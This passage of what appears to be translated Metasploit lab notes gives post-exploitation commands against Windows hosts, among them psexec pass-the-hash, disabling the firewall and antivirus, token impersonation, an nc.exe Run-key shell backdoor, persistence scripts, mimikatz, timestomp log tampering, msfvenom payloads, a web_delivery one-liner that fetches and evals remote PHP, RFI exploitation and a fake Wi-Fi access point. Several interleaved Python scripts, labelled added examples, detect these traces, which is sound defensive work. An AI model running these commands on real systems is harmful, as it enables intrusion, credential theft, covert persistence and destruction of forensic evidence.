        use exploit/windows/smb/psexec
        set RHOST 10.0.0.132
        set SMBUser John
        set SMBPass  aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
        set payload windows/meterpreter/reverse_tcp
        set LHOST 10.0.0.128
        exploit
        
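The hashdump above lists the empty-password NT hash for every account, and the credential_collector output in section 14 of the first post shows a real LM hash for Administrator. The following is an added example, not code from either set of notes: it parses both line formats and reports the weak-storage conditions a defender wants surfaced. The input lines are constructed to mirror the notes.

```python
"""Audit dumped Windows account hashes for weak-storage conditions.

Added example, not code from the notes. It reads both line formats the notes
show: pwdump style from `hashdump` (user:RID:LM:NT:::) and the RID-less
"Extracted: user:LM:NT" lines from credential_collector. For each account it
reports an NT hash equal to the empty-password hash, and an LM hash that is not
the "no LM hash" marker, which means NoLMHash was not enforced when that
password was set; if only the second half of the LM hash is the empty marker,
the password is at most 7 characters long. The input below is constructed.
"""
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM field for an empty password, or when LM storage is off
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash (MD4) of the empty password
EMPTY_LM_HALF = EMPTY_LM[16:]                   # DES output for an empty 7-character half

# Constructed input: three pwdump lines and two credential_collector lines.
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
John:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+] Collecting hashes...
    Extracted: Administrator:b7eab2f3aad8ad3daad3b435b51404ee:ed1bfaeb3063716ab7fe2a11faf126d8
    Extracted: vv:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
"""


def parse_hash_line(line):
    """Return (user, rid, lm, nt) for a hash record (rid is None for the RID-less format), else None."""
    line = line.strip()
    if line.startswith("Extracted:"):
        line = line[len("Extracted:"):].strip()
    parts = line.split(":")
    if len(parts) >= 4 and parts[1].isdigit() and len(parts[2]) == 32 and len(parts[3]) == 32:
        return parts[0], int(parts[1]), parts[2].lower(), parts[3].lower()
    if len(parts) == 3 and len(parts[1]) == 32 and len(parts[2]) == 32:
        return parts[0], None, parts[1].lower(), parts[2].lower()
    return None


def audit_hashes(text):
    """Return [(user, [issue, ...]), ...] in input order, only for accounts with at least one issue."""
    findings = []
    for line in text.splitlines():
        rec = parse_hash_line(line)
        if rec is None:
            continue
        user, rid, lm, nt = rec
        issues = []
        if nt == EMPTY_NT:
            issues.append("empty password" + (" on the built-in Administrator" if rid == 500 else ""))
        if lm != EMPTY_LM:
            issues.append("LM hash stored (NoLMHash not enforced when this password was set)")
            if lm.endswith(EMPTY_LM_HALF):
                issues.append("password is 7 characters or shorter (second LM half is empty)")
        if issues:
            findings.append((user, issues))
    return findings


if __name__ == "__main__":
    for user, issues in audit_hashes(SAMPLE_DUMP):
        print(user, "->", "; ".join(issues))
```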

    4. Basic operations

    1. Disable the firewall

    • Requires administrator or system privileges

      netsh advfirewall set allprofiles state on
      netsh advfirewall set allprofiles state off
      

    2. Stop windefend

    • Check the service name

    • Stop the service

      net stop windefend
      

    3. BitLocker encryption

    • manage-bde -off C:
    • manage-bde -status C:

    4. Disable DEP

    • bcdedit.exe /set {current} nx AlwaysOff

    5. Kill antivirus software

    • run killav
    • run post/windows/manage/killav

    6. Enable the Remote Desktop service

    # enable the service
    run post/windows/manage/enable_rdp
    

    # disable the service (run the saved cleanup script)
    run multi_console_command -rc root/.msf4/loot/20180418001805_default_10.0.0.132_host.windows.cle_842354.txt
    
    # enable the service
    run getgui -e
    run getgui -u yuanfh -p pass
    run multi_console_command -rc /root/.msf4/logs/scripts/getgui/clean_up__20160824.1855.rc
    

    7. View the remote desktop

    • screenshot
    • use espia
      • screengrab

    5. Attacking the domain controller with tokens

    - Tokens
    - Each time a user logs on, the account is bound to a temporary token
    - The token is presented when accessing resources, for authentication, similar to web cookies
    - Delegate tokens: interactive logon sessions
    - Impersonate tokens: non-interactive logon sessions
    - After the account logs off, a delegate token becomes an impersonate token, and its privileges remain valid

    • Incognito

      • A standalone tool that msf has integrated into meterpreter
      • No password, cracking, or password hash is needed: steal tokens to impersonate other users
      • Especially useful for escalating privileges across multiple operating systems in a domain environment
    • Set up a domain environment

      • DC + XP
    • load incognito

      • list_tokens -u
      • impersonate_token lab\administrator
      • Running the commands above requires getsystem
        • A normal local user first needs local privilege escalation
        • use exploit/windows/local/ms10_015_kitrap0d
        • execute -f cmd.exe -i -t # -t: run the program with the currently impersonated token
        • shell

    8. Registry

    • The registry holds almost all of Windows' configuration parameters

      • A wrong modification can crash the system outright
      • Back up the registry completely before modifying it
      • Some registry changes are irreversible
    • Common uses

      • Modify or add startup entries
      • Steal secrets stored in the registry
      • Evade file-based antivirus scanning
    • Add an nc backdoor service through the registry (meterpreter)

      • meterpreter >
      • upload /usr/share/windows-binaries/nc.exe C:\windows\system32
      • reg enumkey -k HKLM\software\microsoft\windows\currentversion\run
      • reg setval -k HKLM\software\microsoft\windows\currentversion\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 444 -e cmd.exe'
      • reg queryval -k HKLM\software\microsoft\windows\currentversion\Run -v nc
    • Open a firewall port (meterpreter)

      • meterpreter >
      • execute -f cmd -i -H
      • netsh firewall show opmode
      • netsh firewall add portopening TCP 4444 "test" ENABLE ALL
      • shutdown -r -f -t 0
      • nc 10.0.0.132 444
    • Other registry keys
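The registry changes made in this section (the nc Run-key entry) and in the UAC-disabling step of section 2 (EnableLUA=0, LocalAccountTokenFilterPolicy=1) can be audited from plain `reg query` output. The following is an added example, not code from the notes; the captured output, the key paths and the SUSPICIOUS_CMD patterns are constructed assumptions for it.

```python
"""Audit `reg query` output for the registry changes the notes make.

Added example, not code from the notes. It parses the text that
`reg query <key>` prints (key path at column 0, values indented, columns
separated by runs of spaces) and checks for: UAC disabled (EnableLUA = 0),
remote UAC filtering disabled (LocalAccountTokenFilterPolicy = 1, which lets a
network logon by a local admin carry a full token) and Run-key entries that
start a listener or bind a shell, such as the nc.exe -Ldp 444 -e cmd.exe entry.
The captured output below is constructed.
"""
import re

RUN_KEYS = (
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
    r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run",
)
POLICY_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"

# Assumed patterns for Run-key command lines that should never appear on a managed host.
SUSPICIOUS_CMD = [
    (re.compile(r"\bnc(?:at)?(?:\.exe)?\b.*\s-e\s", re.I), "netcat bound to a shell"),
    (re.compile(r"\bnc(?:at)?(?:\.exe)?\b.*\s-L", re.I), "netcat persistent listener"),
    (re.compile(r"\\temp\\", re.I), "autostart from a Temp directory"),
]

# Constructed `reg query` output for the two keys the notes touch.
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    VBoxTray    REG_EXPAND_SZ    %SystemRoot%\system32\VBoxTray.exe
    nc    REG_SZ    C:\windows\system32\nc.exe -Ldp 444 -e cmd.exe

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
    EnableLUA    REG_DWORD    0x0
    LocalAccountTokenFilterPolicy    REG_DWORD    0x1
    ConsentPromptBehaviorAdmin    REG_DWORD    0x5
"""


def parse_reg_query(text):
    """Return {key_path: {value_name: (type, data)}} from `reg query` output."""
    keys, current = {}, None
    for line in text.splitlines():
        if not line.strip():
            continue
        if not line.startswith((" ", "\t")):      # key path lines start at column 0
            current = line.strip()
            keys.setdefault(current, {})
            continue
        parts = re.split(r"\s{2,}", line.strip(), maxsplit=2)
        if current is None or len(parts) < 2:
            continue
        name, vtype = parts[0], parts[1]
        data = parts[2] if len(parts) == 3 else ""
        keys[current][name] = (vtype, data)
    return keys


def dword(entry):
    """Convert a REG_DWORD entry such as ('REG_DWORD', '0x1') to an int; None for other types."""
    vtype, data = entry
    return int(data, 16) if vtype == "REG_DWORD" else None


def audit_registry(text):
    """Return a list of findings; an empty list means nothing matched."""
    findings = []
    keys = parse_reg_query(text)
    policy = keys.get(POLICY_KEY, {})
    if "EnableLUA" in policy and dword(policy["EnableLUA"]) == 0:
        findings.append("UAC disabled: EnableLUA=0")
    if "LocalAccountTokenFilterPolicy" in policy and dword(policy["LocalAccountTokenFilterPolicy"]) == 1:
        findings.append("remote UAC filtering off: LocalAccountTokenFilterPolicy=1 (full admin token over SMB)")
    for key in RUN_KEYS:
        for name, (_, cmd) in keys.get(key, {}).items():
            for pattern, label in SUSPICIOUS_CMD:
                if pattern.search(cmd):
                    findings.append("%s: Run value %r -> %s" % (label, name, cmd))
                    break                              # one finding per Run value is enough
    return findings


if __name__ == "__main__":
    for finding in audit_registry(SAMPLE_REG_QUERY):
        print(finding)
```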

    9. Packet capture

    • Capture packets (meterpreter)
      • load sniffer
      • sniffer_interfaces
      • sniffer_start 2
      • sniffer_dump 2 1.cap / sniffer_dump 2 1.cap
      • Captured packets are kept in a ring buffer in memory (50000 packets) and never written to disk
      • Meterpreter's own traffic is filtered out automatically, and the whole transfer is SSL/TLS encrypted
    • Decoding
      • use auxiliary/sniffer/psnuffle
      • set PCAPFILE /root/1.cap

    10. Searching for files

    • search -f *.ini
    • search -d c:\documents\ and\ settings\administrator\desktop\ -f *.docx

    11. Cracking weak passwords

    • Cracking weak passwords with John the Ripper

    - use post/windows/gather/hashdump # requires a system-privileged meterpreter
    - run # results are saved under /tmp
    - use auxiliary/analyze/jtr_crack_fast
    - run

    12. Covering tracks

    • File-system access leaves traces, and these are the main focus of digital forensics
    • Penetration testers and attackers usually want to destroy file-system access traces
    • The best way to avoid detection by forensics: do not touch the file system

      • This is meterpreter's inherent advantage (it is entirely memory-based)
    • MAC times (Modified / Accessed / Changed)

      • ls -l --time=atime/mtime/ctime 1.txt
      • stat 1.txt
      • touch -d "2 days ago" 1.txt
      • touch -t 1501010101 1.txt
    • MACE: MFT entry

      • MFT: the NTFS file system's Master File Table
      • Usually 1024 bytes or 2 disk sectors, holding several entry fields
      • Contains a great deal of file information (size, name, directory location, disk location, creation date)
      • For more, study file-system forensic analysis techniques
    • Timestomp (meterpreter)

      • timestomp -v 1.txt
      • timestomp -f c:\autoexec.bat 1.txt
        -b -r # erase the MACE timestamps; these options currently do not work
      • -m / -a / -c / -e / -z
      • timestomp -z "MM/DD/YYYY HH24:MI:SS" 2.txt
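The MACE checks above, and the `timestomp -v` listings for 1.txt in section 12 of the first post, can be turned into a detection. The following is an added example, not code from the notes: it parses listings in the `timestomp -v` format and flags the two patterns timestomp leaves behind; the three listings it uses are constructed to mirror the ones in the first post.

```python
"""Detect timestomp footprints in NTFS $STANDARD_INFORMATION timestamps.

Added example, not code from the notes. It parses the four lines that
`timestomp -v` prints and applies two checks a forensic reviewer relies on:
  1. all four MACE values identical to the second: the footprint of `timestomp -z`;
  2. Modified later than Entry Modified: any content change also updates the
     MFT record, so M > E does not arise from normal file activity.
The three listings below are constructed for this example.
"""
from datetime import datetime
import re

MACE_FIELDS = ("Modified", "Accessed", "Created", "Entry Modified")
LINE_RE = re.compile(
    r"^\s*(Modified|Accessed|Created|Entry Modified)\s*:\s*"
    r"(\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2} [+-]\d{4})\s*$"
)

# Untouched file, as listed before any timestomp call.
SAMPLE_NATURAL = """\
[*] Showing MACE attributes for 1.txt
Modified      : 2018-09-04 10:58:47 +0800
Accessed      : 2018-09-04 10:58:37 +0800
Created       : 2018-09-04 10:58:37 +0800
Entry Modified: 2018-09-04 10:58:47 +0800
"""
# After `timestomp -z "03/11/2019 22:22:22" 1.txt`.
SAMPLE_Z = """\
Modified      : 2019-03-11 22:22:22 +0800
Accessed      : 2019-03-11 22:22:22 +0800
Created       : 2019-03-11 22:22:22 +0800
Entry Modified: 2019-03-11 22:22:22 +0800
"""
# After only the Modified value was set (timestomp -m).
SAMPLE_M = """\
Modified      : 2019-03-11 22:22:22 +0800
Accessed      : 2018-09-04 10:58:37 +0800
Created       : 2018-09-04 10:58:37 +0800
Entry Modified: 2018-09-04 10:58:47 +0800
"""


def parse_timestomp_v(text):
    """Return {field: aware datetime} for the four MACE lines in a `timestomp -v` listing."""
    mace = {}
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            mace[m.group(1)] = datetime.strptime(m.group(2), "%Y-%m-%d %H:%M:%S %z")
    missing = [f for f in MACE_FIELDS if f not in mace]
    if missing:
        raise ValueError("listing is missing MACE fields: " + ", ".join(missing))
    return mace


def mace_anomalies(mace):
    """Return the reasons a MACE set looks tampered with; an empty list means no finding."""
    reasons = []
    if len({mace[f] for f in MACE_FIELDS}) == 1:
        reasons.append("all four MACE values identical (timestomp -z pattern)")
    if mace["Modified"] > mace["Entry Modified"]:
        reasons.append("Modified later than Entry Modified (MFT record never saw the change)")
    return reasons


def audit_listing(text):
    """Parse one listing and return its anomaly reasons."""
    return mace_anomalies(parse_timestomp_v(text))


if __name__ == "__main__":
    for name, sample in (("natural", SAMPLE_NATURAL), ("-z", SAMPLE_Z), ("-m", SAMPLE_M)):
        print(name, audit_listing(sample) or ["clean"])
```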

    13. Pivoting (jump host / hub / pivot point)

    • Build the payload with msfvenom
      msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=kali_firewall LPORT=4444 -b "\x00\xff" -e x86/shikata_ga_nai -f exe -o payload.exe
    • Obtain system privileges

    • Use a computer that is already under control as the jump host into the internal network

    • To the other internal hosts, all access appears to come from the jump host
    • run autoroute -s 1.1.1.0/24 # the target's internal subnet that cannot reach the outside network

    • Autoroute in a realistic scenario

      • Attack the internal XP host via Win7 (compare the cases where XP does and does not have outside network access)
        – Scan the internal network: use auxiliary/scanner/portscan/tcp
    • Pivoting via port forwarding: portfwd

      • Use the compromised computer to forward ports between Kali and the attack target
      • portfwd add -L LIP -l LPORT -r RIP -p RPORT
      • portfwd add -L 1.1.1.10 -l 445 -r 2.1.1.11 -p 3389
      • portfwd list / delete / flush
    • use exploit/windows/smb/ms08_067_netapi

      • set RHOST 127.0.0.1
      • set LHOST 2.1.1.10
    • use exploit/multi/handler
      • set exitonsession false
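Pivoting as laid out in section 13 of both posts has a network footprint a defender can look for: one internal host holding an established connection to an outside address, then opening SMB connections to many internal peers. The following is an added example, not code from the notes; the protected ranges and the flow records are constructed from the lab addresses in the first post (WIN7 2.1.1.10, Kali 1.1.1.10, XP 2.1.1.11).

```python
"""Flag a pivot host from connection records.

Added example, not code from the notes. The scenario in section 13 is the
detection target: WIN7 (2.1.1.10) keeps a reverse_tcp session to Kali
(1.1.1.10:4444); after `run autoroute` the same host fans out to
2.1.1.9-2.1.1.12 on 139/445 and later accepts the XP reverse shell on its own
port 4444. A host is flagged when it has an ESTABLISHED outbound connection to
an address outside the protected ranges AND outbound SMB connections to at
least FANOUT_THRESHOLD distinct internal hosts. Ranges and flows are assumptions.
"""
from collections import defaultdict
from ipaddress import ip_address, ip_network

# Assumption: the lab's internal ranges from the notes; Kali's 1.1.1.0/24 is outside them.
PROTECTED = (ip_network("2.1.1.0/24"), ip_network("192.168.155.0/24"))
SMB_PORTS = {139, 445}
FANOUT_THRESHOLD = 3

# Constructed flows: (src_ip, dst_ip, dst_port, state), in the order the notes' steps happen.
FLOWS = [
    ("2.1.1.10", "1.1.1.10", 4444, "ESTABLISHED"),  # WIN7 -> Kali handler (C2 channel)
    ("2.1.1.10", "2.1.1.9", 139, "SYN"),             # portscan via autoroute starts
    ("2.1.1.10", "2.1.1.9", 445, "SYN"),
    ("2.1.1.10", "2.1.1.11", 139, "ESTABLISHED"),
    ("2.1.1.10", "2.1.1.11", 445, "ESTABLISHED"),
    ("2.1.1.10", "2.1.1.12", 445, "SYN"),
    ("2.1.1.11", "2.1.1.10", 4444, "ESTABLISHED"),   # XP -> handler relayed through WIN7
    ("2.1.1.12", "1.1.1.1", 443, "ESTABLISHED"),     # ordinary outbound web traffic: not a pivot
    ("2.1.1.12", "2.1.1.11", 445, "ESTABLISHED"),    # a single file-share connection: not a pivot
]


def is_protected(ip):
    """True when the address lies inside one of the protected ranges."""
    addr = ip_address(ip)
    return any(addr in net for net in PROTECTED)


def find_pivots(flows, threshold=FANOUT_THRESHOLD):
    """Return {host: {"external_peers": [...], "smb_targets": [...]}} for hosts that look like pivots."""
    external = defaultdict(set)   # internal host -> outside addresses it holds sessions to
    smb = defaultdict(set)        # internal host -> internal peers it connected to on SMB ports
    for src, dst, dport, state in flows:
        if not is_protected(src):
            continue                          # only hosts inside the protected ranges are judged
        if not is_protected(dst):
            if state == "ESTABLISHED":
                external[src].add(dst)        # candidate C2 / handler connection
        elif dport in SMB_PORTS and dst != src:
            smb[src].add(dst)                 # lateral SMB connection inside the network
    pivots = {}
    for host in external:
        if len(smb[host]) >= threshold:
            pivots[host] = {
                "external_peers": sorted(external[host], key=ip_address),
                "smb_targets": sorted(smb[host], key=ip_address),
            }
    return pivots


if __name__ == "__main__":
    for host, detail in find_pivots(FLOWS).items():
        print(host, "holds a session to", detail["external_peers"], "and scanned", detail["smb_targets"])
```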

    14. POST modules

    • meterpreter >
    • run post/windows/gather/arp_scanner RHOSTS=10.0.0.0/24
    • run post/windows/gather/checkvm
    • run post/windows/gather/credentials/credential_collector
    • run post/windows/gather/enum_applications
    • run post/windows/gather/enum_logged_on_users
    • run post/windows/gather/enum_snmp
    • run post/windows/manage/delete_user USERNAME=yuanfh
    • run post/multi/recon/local_exploit_suggester
    • run post/multi/gather/env
    • run post/multi/gather/firefox_creds
    • run post/multi/gather/ssh_creds
    • run post/multi/gather/check_malware REMOTEFILE=c:\a.exe
    • run hostsedit -e 1.1.1.1,www.baidu.com
    • migrate -N explorer.exe
    • run [tab] [tab]
    • run winenum

    • Auto-run meterpreter scripts

      • set AutoRunScript hostsedit -e 1.1.1.1,www.baidu.com
      • set InitialAutoRunScript checkvm
    • Auto-run post modules

      • set InitialAutoRunScript migrate -n explorer.exe
      • set AutoRunScript post/windows/gather/dumplinks

    15. Persistent backdoors

    • A meterpreter obtained through an exploit runs in memory only and is lost on reboot
    • Re-exploiting the vulnerability may crash the service
    • A persistent backdoor keeps remote control even after the vulnerability has been patched

    • meterpreter backdoor (metsvc)

      • run metsvc -A # remove with -r
      • use exploit/multi/handler
      • set PAYLOAD windows/metsvc_bind_tcp
      • set LPORT 31337
      • set RHOST 1.1.1.1
    • Persistent backdoor (persistence script)

      • run persistence -h
      • run persistence -X -i 10 -p 4444 -r 10.0.0.128
      • run persistence -U -i 20 -p 4444 -r 10.0.0.128
      • run persistence -S -i 20 -p 4444 -r 10.0.0.128

    16. Extended msf usage: mimikatz

    • hashdump itself uses part of mimikatz's functionality
      • getsystem
      • load mimikatz
      • wdigest / kerberos / msv / ssp / tspkg / livessp
      • mimikatz_command -h
      • mimikatz_command -f a::
      • mimikatz_command -f samdump::hashes
      • mimikatz_command -f handle::list
      • mimikatz_command -f service::list
      • mimikatz_command -f crypto::listProviders
      • mimikatz_command -f winmine::infos # the Minesweeper game

    17. Code-execution vulnerabilities

    • PHP shell

      • msfvenom -p php/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=3333 -f raw -o a.php
      • Start the listener in msf
      • Upload it to the web site and access it through a browser
    • Web Delivery

      • Use the code-execution vulnerability to fetch the payload from the attacker's server
      • use exploit/multi/script/web_delivery
      • set target 1
      • run
      • php -d allow_url_fopen=true -r "eval(file_get_contents('http://1.1.1.1/fTYWqmu'));"

    18. RFI (remote file inclusion)

    • vi /etc/php5/cgi/php.ini
      • allow_url_fopen = On
      • allow_url_include = On
    • use exploit/unix/webapp/php_include
    • set RHOST 1.1.1.2
    • set PATH /dvwa/vulnerabilities/fi/
    • set PHPURI /?page=XXpathXX
    • set HEADERS "Cookie:security=low;PHPSESSID=eefcf023ba61219d4745ad7487fe81d7"
    • set payload php/meterpreter/reverse_tcp
    • set lhost 1.1.1.1
    • exploit

    19. Karmetasploit

    • Fake AP, password sniffing, data interception, browser attacks
    • Multi-exploit resource file: wget https://www.offensive-security.com/wp-content/uploads/2015/04/karma.rc_.txt

    • Install the other dependencies

      • gem install activerecord sqlite3-ruby
    • Install and configure the infrastructure

      • apt-get install isc-dhcp-server
      • cat /etc/dhcp/dhcpd.conf
        option domain-name-servers 10.0.0.1;
        default-lease-time 60;
        max-lease-time 72;
        ddns-update-style none;
        authoritative;
        log-facility local7;
        subnet 10.0.0.0 netmask 255.255.255.0 {
        range 10.0.0.100 10.0.0.254;
        option routers 10.0.0.1;
        option domain-name-servers 10.0.0.1;
        }
    • Fake AP

      • airmon-ng start wlan0
      • airbase-ng -P -C 30 -e "FREE" -v wlan0mon
      • ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
      • touch /var/lib/dhcp/dhcpd.leases
      • dhcpd -cf /etc/dhcp/dhcpd.conf at0
    • Start Karmetasploit

      • msfconsole -q -r karma.rc_.txt
    • Allow users to browse the Internet normally

    • Start Karmetasploit

      • msfconsole -q -r karma.rc_.txt
    • Add routing and firewall rules

      • echo 1 > /proc/sys/net/ipv4/ip_forward
      • iptables -P FORWARD ACCEPT
      • iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE